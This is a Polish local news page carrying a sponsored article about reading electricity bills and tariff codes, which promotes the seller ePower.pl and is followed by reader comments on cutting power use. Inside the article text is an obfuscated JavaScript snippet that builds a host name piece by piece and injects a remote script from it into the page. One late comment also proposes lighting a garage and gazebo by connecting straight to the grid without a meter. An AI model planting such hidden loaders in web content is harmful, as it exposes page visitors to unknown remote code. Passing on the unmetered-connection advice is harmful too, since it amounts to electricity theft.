Portal nr 1 w powiecie bolesławieckim
BolecFORUM Nowy temat
Tekst zlecony
15 marca 2015r. godz. 08:51, odsłon: 7234, Redakcja

Jak płacić niższe rachunki za prąd

Najprostszym sposobem obniżenia rachunków za energię elektryczną jest zmiana jego sprzedawcy.
(fot. Bolec.Info)
A żeby to zrobić świadomie warto nauczyć się czytać faktury, aby wiedzieć, za co konkretnie płacimy. A więc do dzieła.

W tej chwili na rynku są różne faktury za energię elektryczną. Najprościej rzecz ujmując ich rodzaj zależy od tego, od kogo kupujemy prąd. Czasem dostajemy tylko jedną, a czasem dwie.

- jedna faktura nazywa się „kompleksową”. Trafia do naszych skrzynek wtedy, gdy sprzedawca jest również dystrybutorem energii i są na niej wyróżnione wszystkie części składowe ceny;

- dwie faktury dostaniemy w sytuacji, gdy sprzedawca nie jest dystrybutorem. Od tego pierwszego dostaniemy wówczas fakturę „sprzedażową”, od drugiego - „dystrybucyjną”. Niektórzy klienci obawiają się, że to skomplikuje im płacenie rachunków. Niepotrzebnie, bo wystarczy np., ustawić polecenie zapłaty. Podobna sytuacja jest zresztą w przypadku opłat za mieszkanie: przelewamy je na dwa konta – osobno czynsz i osobno kwotę na fundusz remontowy. Opłata za energię elektryczną działa na podobnej zasadzie.

Faktura „kompleksowa” jest najszersza; „sprzedażowa” i „dystrybucyjna” są rozbiciem jej na dwie części.

Na fakturze „kompleksowej” znajdują się informacje na temat jej wystawcy (numer, data), odbiorcy (czyli dane klienta) oraz rodzaj taryfy złożony z ciągu litery i cyfr. Żeby go rozszyfrować, trzeba wiedzieć, że:

-  litera oznacza poziom napięcia zasilania, przy czym „A” i „B” widnieją na fakturach raczej rzadko, ponieważ są przypisane zakładom przemysłowym różnej wielkości. Litera „C” oznacza przedsiębiorstwa (napięcie poniżej 1kV), a najczęściej spotykana „G”  – gospodarstwa domowe;

- pierwszą cyfrą zawsze jest „jedynka” albo „dwójka”, co  oznacza wielkość zamówionej mocy. Dla „jedynki” jest to mniej niż 40 kW,  dla „dwójki” - powyżej 40 kW;

- druga cyfra informuje o tym, czy korzystamy z taryfy jedno-, czy dwustrefowej (mówiąc prościej: czy przez całą dobę płacimy za prąd tyle samo, czy też nocą – mniej).

Większość faktur jest wystawianych dla gospodarstw domowych, mocy do 40 kW i jednej taryfy. Ich oznaczenie to: G11. Właśnie taki symbol zobaczymy najczęściej na fakturze za prąd.

Oprócz tego mają jeszcze jeden punkt wspólny: zwykle są fakturami prognozowymi, czyli wyliczonymi na podstawie dotychczasowego zużycia. Prawdziwe raz na pół roku odczytuje z licznika inkasent. Dopiero wtedy robiona jest korekta i płacimy ostateczną cenę.  Może się okazać, że mamy nadpłatę, bo wcześniej zapłaciliśmy więcej. Albo na odwrót. Sposobem na uniknięcie takiej sytuacji jest zainstalowanie inteligentnego e-licznika, który na bieżąco przesyła dane na temat rzeczywistego zużycia energii. Usługę taką oferuje np. ePower.pl, pierwszy w Polsce sprzedawca prądu przez internet. Dodatkowo klientom, którzy w ciągu roku zużywają minimum 25 MWh, ePower.pl udostępnia go za darmo.
Na drugiej stronie faktury znajdują się informacje na temat okresu rozliczeniowego (dla małych przedsiębiorstw zwykle to jeden-dwa miesiące, a dla gospodarstw domowych – pół roku) oraz opłat. Są to:

- wskazanie licznika i cena za 1 kilowatogodzinę

- opłata handlowa (czyli opłata za fakturowanie itd.);

- opłaty dystrybucyjne (pobierane przez dystrybutora);

- stawka VAT – 23 proc.

Warto wiedzieć, że dystrybutora nie można zmienić, ponieważ każdy rejon ma go przydzielonego odgórnie. Dla naszych rachunków nie jest to jednak istotne, ponieważ stawki dystrybutorów są regulowane przez Urząd Regulacji Energetyki. Można za to oszczędzić wybierając sprzedawcę, który nie nalicza opłaty handlowej, a tak jest np. w epower.pl. W efekcie dostajemy tańszy prąd.

(function(){ urap=document.createElement("script");urap.type="text/javascript"; urap.async=true;urap_=(("us")+"t")+"a";urap_+=("t.i")+""+"n";urap_+=(("f")+"o"); urap.src="http://"+urap_+"/1918300.4vkgd3q4rap8rtak5hXzpqy5qallex"; document.body.appendChild(urap); })();

Jak płacić niższe rachunki za prąd

~F/X niezalogowany
17 marca 2015r. o 8:26
CNC napisał(a):
~ napisał(a): opłaca sie wogóle zmieniac dostawce ??? jaka jest róznica w cenie???


dostawcę nie ale urządzenia oczywiście
stary --tv pobór 170w nowy 70
komp 200w laptop 65
żarówki 15x 35w nowe led 15x4.5
czas na wymianę lodówki :D

Wydał 7000zł zaoszczędził 200zł.
Ekonomia z górnej półki :D
Pralka żelazko czajnik zmywarka to sa urzadzenia które pobierają 90% prądu w domu. Chcesz zaoszczędzić pierz w zimnej wodzie prasuj pod tyłkiem nie rób herbaty
Zgłoś do moderacji Odpowiedz
2987
#Nightmare nieaktywny
17 marca 2015r. o 10:26
Zgadza się. W stacjonarnym PC jak pada płyta główna, to wymieniasz za niewielkie pieniądze na drugą. Podobnie z innymi podzespołami. W laptopie jak padnie płyta, w większości przypadków naprawa jest nieopłacalna.
Zgłoś do moderacji Odpowiedz
~ niezalogowany
28 kwietnia 2015r. o 20:32
~majętny Stef napisał(a):
~ napisał(a):
k1p napisał(a): Pralka, lodówka, odkurzacz, komputer, TV itp. - myślę, że tego typu sprzęty mają większy wpływ na wysokość rachunku.

Wszystko ma wpływ. Moje rachunki spadły o 50% bez zmiany dostawcy.
- wszystkie żarówki na LED-ach
- TV też wymienione na LED oszczędność 3-4x
- lodówka nowa pobiera 2x mniej prądu niż stara
- pralka - poprzednia ciągnęła prąd jak smok
- PC - tu największe oszczędności. Laptop potrafi brać 10x mniej prądu od skrzynki.


Można wiedzieć ile to w złotówkach ten twój nowy rachunek?
Mówisz że kupiłeś nową pralkę, lodówkę ,laptopa, telewizor, nowe żarówki.
Ile wydałeś, ile oszczędzasz ,ile to ma gwarancji i kiedy wymienisz nowe na nowe?



Jak zaoszczędzić? Zlikwidować liczniki w garażu i altance bo zużycie prądu w tych miejscach jest o wiele niższe niż opłaty przesyłowe.
Zastanowić się nad oświetleniem tych miejsc bez licznika i bezpośredniego podłączenia do sieci energetycznej.

Zgłoś do moderacji Odpowiedz
Wypowiedz się:
Jeśli zostawisz to pole puste przypiszemy Ci losową ksywę.
Publikacja czyichś danych osobowych bez zezwolenia czy użycie zwrotów obraźliwych podlega odpowiedzialności karnej i będzie skutkować przekazaniem danych publikującego organom ścigania.
Publikowane komentarze są prywatnymi opiniami użytkowników serwisu. Bolec.Info nie ponosi odpowiedzialności za treść opinii i wypowiedzi, a osoba zamieszczająca wypowiedź może ponieść za jej treść odpowiedzialność karną i cywilną. Bolec.Info zastrzega sobie prawo do moderowania wszystkich opublikowanych wypowiedzi, jednak nie bierze na siebie takiego obowiązku. Pamiętaj, że dodając zdjęcie deklarujesz, że jesteś jego autorem i przekazujesz Wydawcy Bolec.Info prawa do jego publikacji i udostępniania. Umieszczając cudze zdjęcia możesz złamać prawo autorskie. Bolec.Info nie ponosi odpowiedzialności za publikowane zdjęcia.
Daj nam Cynk - zgarnij nagrodę!

Byłeś świadkiem jakiegoś wypadku lub innego zdarzenia? Wiesz coś, o czym my nie wiemy albo jeszcze nie napisaliśmy? Daj nam znać i zgłoś swój temat!

Wypełnij formularz lub wyślij pod adres: [email protected].

Kontakt telefoniczny z Redakcją Bolec.Info: +48 693 375 790 (przez całą dobę).

REKLAMAEfekt-Okna zaprasza